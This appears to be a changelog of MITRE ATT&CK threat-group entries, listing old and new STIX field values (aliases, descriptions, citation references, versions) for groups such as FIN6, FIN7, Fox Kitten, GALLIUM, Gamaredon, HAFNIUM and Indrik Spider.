| external_references | {'source_name': 'Secureworks Karagany July 2019', 'description': 'Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.', 'url': 'https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector'} | |
| external_references | {'source_name': 'Gigamon Berserk Bear October 2021', 'description': 'Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.', 'url': 'https://vblocalhost.com/uploads/VB2021-Slowik.pdf'} | |
| external_references | {'source_name': 'Symantec Dragonfly Sept 2017', 'description': 'Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.', 'url': 'https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers'} | |
| external_references | {'source_name': 'Symantec Dragonfly', 'description': 'Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.', 'url': 'https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments'} | |
| external_references | {'source_name': 'Symantec Dragonfly 2.0 October 2017', 'description': 'Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved April 19, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks'} | |
| external_references | {'source_name': 'UK GOV FSB Factsheet April 2022', 'description': "UK Gov. (2022, April 5). Russia's FSB malign activity: factsheet. Retrieved April 5, 2022.", 'url': 'https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet'} | |
| Description |
|---|
| [FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 17:23:58.316000+00:00 | 2022-06-02 20:11:01.957000+00:00 |
| aliases[2] | SKELETON SPIDER | ITG08 |
| aliases[3] | ITG08 | Skeleton Spider |
| external_references[1]['source_name'] | FIN6 | Skeleton Spider |
| external_references[1]['description'] | (Citation: FireEye FIN6 April 2016) | (Citation: Crowdstrike Global Threat Report Feb 2018) |
| external_references[2]['source_name'] | Magecart Group 6 | FIN6 |
| external_references[2]['description'] | (Citation: Security Intelligence ITG08 April 2020) | (Citation: FireEye FIN6 April 2016) |
| external_references[3]['source_name'] | SKELETON SPIDER | Magecart Group 6 |
| external_references[3]['description'] | (Citation: Crowdstrike Global Threat Report Feb 2018) | (Citation: Security Intelligence ITG08 April 2020) |
| external_references[5]['source_name'] | FireEye FIN6 April 2016 | Crowdstrike Global Threat Report Feb 2018 |
| external_references[5]['description'] | FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016. | CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018. |
| external_references[5]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf | https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report |
| external_references[6]['source_name'] | FireEye FIN6 Apr 2019 | FireEye FIN6 April 2016 |
| external_references[6]['description'] | McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. | FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016. |
| external_references[6]['url'] | https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html | https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf |
| external_references[7]['source_name'] | Security Intelligence ITG08 April 2020 | FireEye FIN6 Apr 2019 |
| external_references[7]['description'] | Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020. | McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. |
| external_references[7]['url'] | https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/ | https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html |
| external_references[8]['source_name'] | Crowdstrike Global Threat Report Feb 2018 | Security Intelligence ITG08 April 2020 |
| external_references[8]['description'] | CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018. | Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020. |
| external_references[8]['url'] | https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report | https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/ |
| Description |
|---|
| [FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013 primarily targeting the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. Since 2020 [FIN7](https://attack.mitre.org/groups/G0046) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware as a Service (RaaS), Darkside. [FIN7](https://attack.mitre.org/groups/G0046) may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but there appears to be several groups using [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Edward Millington'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | http://blog.morphisec.com/fin7-attacks-restaurant-industry | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-19 00:02:08.486000+00:00 | 2022-07-20 20:06:44.706000+00:00 |
| external_references[1]['source_name'] | FIN7 | Carbon Spider |
| external_references[1]['description'] | (Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018) | (Citation: CrowdStrike Carbon Spider August 2021) |
| external_references[2]['source_name'] | GOLD NIAGARA | FIN7 |
| external_references[2]['description'] | (Citation: Secureworks GOLD NIAGARA Threat Profile) | (Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018) |
| external_references[3]['source_name'] | ITG14 | GOLD NIAGARA |
| external_references[3]['description'] | ITG14 shares campaign overlap with FIN7.(Citation: IBM Ransomware Trends September 2020) | (Citation: Secureworks GOLD NIAGARA Threat Profile) |
| external_references[4]['source_name'] | Carbon Spider | FireEye CARBANAK June 2017 |
| external_references[4]['description'] | (Citation: CrowdStrike Carbon Spider August 2021) | Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018. |
| external_references[5]['source_name'] | FireEye FIN7 March 2017 | FireEye FIN7 April 2017 |
| external_references[5]['description'] | Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017. | Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017. |
| external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html | https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html |
| external_references[6]['source_name'] | FireEye FIN7 April 2017 | FireEye FIN7 Aug 2018 |
| external_references[6]['description'] | Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017. | Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018. |
| external_references[6]['url'] | https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html | https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html |
| external_references[7]['source_name'] | FireEye CARBANAK June 2017 | Secureworks GOLD NIAGARA Threat Profile |
| external_references[7]['description'] | Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018. | CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021. |
| external_references[7]['url'] | https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html | https://www.secureworks.com/research/threat-profiles/gold-niagara |
| external_references[8]['source_name'] | FireEye FIN7 Aug 2018 | FireEye FIN7 Shim Databases |
| external_references[8]['description'] | Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018. | Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017. |
| external_references[8]['url'] | https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html | https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html |
| external_references[9]['source_name'] | CrowdStrike Carbon Spider August 2021 | Morphisec FIN7 June 2017 |
| external_references[9]['description'] | Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021. | Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017. |
| external_references[9]['url'] | https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/ | http://blog.morphisec.com/fin7-attacks-restaurant-industry |
| external_references[10]['source_name'] | Morphisec FIN7 June 2017 | ITG14 |
| external_references[10]['description'] | Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017. | ITG14 shares campaign overlap with [FIN7](https://attack.mitre.org/groups/G0046).(Citation: IBM Ransomware Trends September 2020) |
| external_references[11]['source_name'] | FireEye FIN7 Shim Databases | CrowdStrike Carbon Spider August 2021 |
| external_references[11]['description'] | Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017. | Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021. |
| external_references[11]['url'] | https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html | https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/ |
| external_references[12]['source_name'] | Secureworks GOLD NIAGARA Threat Profile | FireEye FIN7 March 2017 |
| external_references[12]['description'] | CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021. | Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017. |
| external_references[12]['url'] | https://www.secureworks.com/research/threat-profiles/gold-niagara | https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html |
| x_mitre_version | 2.0 | 2.1 |
| Description |
|---|
| [Fox Kitten](https://attack.mitre.org/groups/G0117) is a threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. [Fox Kitten](https://attack.mitre.org/groups/G0117) has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering.(Citation: ClearkSky Fox Kitten February 2020)(Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: Dragos PARISITE )(Citation: ClearSky Pay2Kitten December 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-20 22:02:30.995000+00:00 | 2022-06-02 20:12:00.458000+00:00 |
| aliases[2] | PIONEER KITTEN | Parisite |
| aliases[3] | Parisite | Pioneer Kitten |
| external_references[2]['source_name'] | PIONEER KITTEN | Pioneer Kitten |
| external_references[4]['source_name'] | ClearkSky Fox Kitten February 2020 | CISA AA20-259A Iran-Based Actor September 2020 |
| external_references[4]['description'] | ClearSky. (2020, February 16). Fox Kitten – Widespread Iranian Espionage-Offensive Campaign. Retrieved December 21, 2020. | CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020. |
| external_references[4]['url'] | https://www.clearskysec.com/fox-kitten/ | https://us-cert.cisa.gov/ncas/alerts/aa20-259a |
| external_references[5]['source_name'] | CrowdStrike PIONEER KITTEN August 2020 | ClearSky Pay2Kitten December 2020 |
| external_references[5]['description'] | Orleans, A. (2020, August 31). Who Is PIONEER KITTEN?. Retrieved December 21, 2020. | ClearSky. (2020, December 17). Pay2Key Ransomware – A New Campaign by Fox Kitten. Retrieved December 21, 2020. |
| external_references[5]['url'] | https://www.crowdstrike.com/blog/who-is-pioneer-kitten/ | https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf |
| external_references[6]['source_name'] | Dragos PARISITE | ClearkSky Fox Kitten February 2020 |
| external_references[6]['description'] | Dragos. (n.d.). PARISITE. Retrieved December 21, 2020. | ClearSky. (2020, February 16). Fox Kitten – Widespread Iranian Espionage-Offensive Campaign. Retrieved December 21, 2020. |
| external_references[6]['url'] | https://www.dragos.com/threat/parisite/ | https://www.clearskysec.com/fox-kitten/ |
| external_references[7]['source_name'] | ClearSky Pay2Kitten December 2020 | Dragos PARISITE |
| external_references[7]['description'] | ClearSky. (2020, December 17). Pay2Key Ransomware – A New Campaign by Fox Kitten. Retrieved December 21, 2020. | Dragos. (n.d.). PARISITE. Retrieved December 21, 2020. |
| external_references[7]['url'] | https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf | https://www.dragos.com/threat/parisite/ |
| external_references[8]['source_name'] | CISA AA20-259A Iran-Based Actor September 2020 | CrowdStrike PIONEER KITTEN August 2020 |
| external_references[8]['description'] | CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020. | Orleans, A. (2020, August 31). Who Is PIONEER KITTEN?. Retrieved December 21, 2020. |
| external_references[8]['url'] | https://us-cert.cisa.gov/ncas/alerts/aa20-259a | https://www.crowdstrike.com/blog/who-is-pioneer-kitten/ |
| Old Description | New Description |
|---|---|
| [GALLIUM](https://attack.mitre.org/groups/G0093) is a group that has been active since at least 2012, primarily targeting high-profile telecommunications networks. [GALLIUM](https://attack.mitre.org/groups/G0093) has been identified in some reporting as likely a Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019) | [GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-23 01:32:21.874000+00:00 | 2022-08-12 21:26:22.303000+00:00 |
| description | [GALLIUM](https://attack.mitre.org/groups/G0093) is a group that has been active since at least 2012, primarily targeting high-profile telecommunications networks. [GALLIUM](https://attack.mitre.org/groups/G0093) has been identified in some reporting as likely a Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019) | [GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022) |
| external_references[1]['source_name'] | GALLIUM | Operation Soft Cell |
| external_references[1]['description'] | (Citation: Microsoft GALLIUM December 2019) | (Citation: Cybereason Soft Cell June 2019) |
| external_references[2]['source_name'] | Operation Soft Cell | GALLIUM |
| external_references[2]['description'] | (Citation: Cybereason Soft Cell June 2019) | (Citation: Microsoft GALLIUM December 2019) |
| x_mitre_version | 2.0 | 3.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Unit 42 PingPull Jun 2022', 'description': 'Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022.', 'url': 'https://unit42.paloaltonetworks.com/pingpull-gallium/'} | |
| Old Description | New Description |
|---|---|
| [Gamaredon Group](https://attack.mitre.org/groups/G0047) is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word "Armageddon", which was detected in the adversary's early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020) | [Gamaredon Group](https://attack.mitre.org/groups/G0047) is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word "Armageddon", which was detected in the adversary's early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022) In November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://attack.mitre.org/groups/G0047) to Russia's Federal Security Service (FSB) Center 18.(Citation: Bleepingcomputer Gamardeon FSB November 2021)(Citation: Microsoft Actinium February 2022) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/ | |
| external_references | https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/ | |
| external_references | https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/ | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-01-20 22:20:20.981000+00:00 | 2022-04-15 13:46:34.474000+00:00 |
| description | [Gamaredon Group](https://attack.mitre.org/groups/G0047) is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word "Armageddon", which was detected in the adversary's early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020) | [Gamaredon Group](https://attack.mitre.org/groups/G0047) is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word "Armageddon", which was detected in the adversary's early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022) In November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://attack.mitre.org/groups/G0047) to Russia's Federal Security Service (FSB) Center 18.(Citation: Bleepingcomputer Gamardeon FSB November 2021)(Citation: Microsoft Actinium February 2022) |
| external_references[1]['source_name'] | Gamaredon Group | ACTINIUM |
| external_references[1]['description'] | (Citation: Palo Alto Gamaredon Feb 2017) | (Citation: Microsoft Actinium February 2022) |
| external_references[2]['source_name'] | Palo Alto Gamaredon Feb 2017 | DEV-0157 |
| external_references[2]['description'] | Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017. | (Citation: Microsoft Actinium February 2022) |
| external_references[3]['source_name'] | TrendMicro Gamaredon April 2020 | Gamaredon Group |
| external_references[3]['description'] | Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020. | (Citation: Palo Alto Gamaredon Feb 2017) |
| external_references[4]['source_name'] | ESET Gamaredon June 2020 | IRON TILDEN |
| external_references[4]['description'] | Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020. | (Citation: Secureworks IRON TILDEN Profile) |
| x_mitre_version | 1.2 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | IRON TILDEN | |
| aliases | Primitive Bear | |
| aliases | ACTINIUM | |
| aliases | Armageddon | |
| aliases | Shuckworm | |
| aliases | DEV-0157 | |
| external_references | {'source_name': 'Armageddon', 'description': '(Citation: Symantec Shuckworm January 2022)'} | |
| external_references | {'source_name': 'Shuckworm', 'description': '(Citation: Symantec Shuckworm January 2022)'} | |
| external_references | {'source_name': 'Primitive Bear', 'description': '(Citation: Unit 42 Gamaredon February 2022)'} | |
| external_references | {'source_name': 'ESET Gamaredon June 2020', 'description': 'Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.', 'url': 'https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/'} | |
| external_references | {'source_name': 'TrendMicro Gamaredon April 2020', 'description': 'Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.', 'url': 'https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/'} | |
| external_references | {'source_name': 'Palo Alto Gamaredon Feb 2017', 'description': 'Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.', 'url': 'https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/'} | |
| external_references | {'source_name': 'Microsoft Actinium February 2022', 'description': 'Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022.', 'url': 'https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/'} | |
| external_references | {'source_name': 'Secureworks IRON TILDEN Profile', 'description': 'Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.', 'url': 'https://www.secureworks.com/research/threat-profiles/iron-tilden'} | |
| external_references | {'source_name': 'Symantec Shuckworm January 2022', 'description': 'Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine'} | |
| external_references | {'source_name': 'Bleepingcomputer Gamardeon FSB November 2021', 'description': 'Toulas, B. (2018, November 4). Ukraine links members of Gamaredon hacker group to Russian FSB. Retrieved April 15, 2022.', 'url': 'https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/'} | |
| external_references | {'source_name': 'Unit 42 Gamaredon February 2022', 'description': 'Unit 42. (2022, February 3). Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022.', 'url': 'https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/'} | |
| Description |
|---|
| [HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://attack.mitre.org/groups/G0125) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-25 23:43:56.055000+00:00 | 2022-07-06 20:05:26.079000+00:00 |
| external_references[2]['source_name'] | Microsoft HAFNIUM March 2020 | Volexity Exchange Marauder March 2021 |
| external_references[2]['description'] | MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021. | Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021. |
| external_references[2]['url'] | https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ | https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ |
| external_references[3]['source_name'] | Volexity Exchange Marauder March 2021 | Microsoft HAFNIUM March 2020 |
| external_references[3]['description'] | Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021. | MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021. |
| external_references[3]['url'] | https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ | https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ |
| x_mitre_version | 1.0 | 1.2 |
| Old Description | New Description |
|---|---|
| [Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that as been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019) | [Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that has been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 16:14:32.314000+00:00 | 2022-09-15 19:49:18.799000+00:00 |
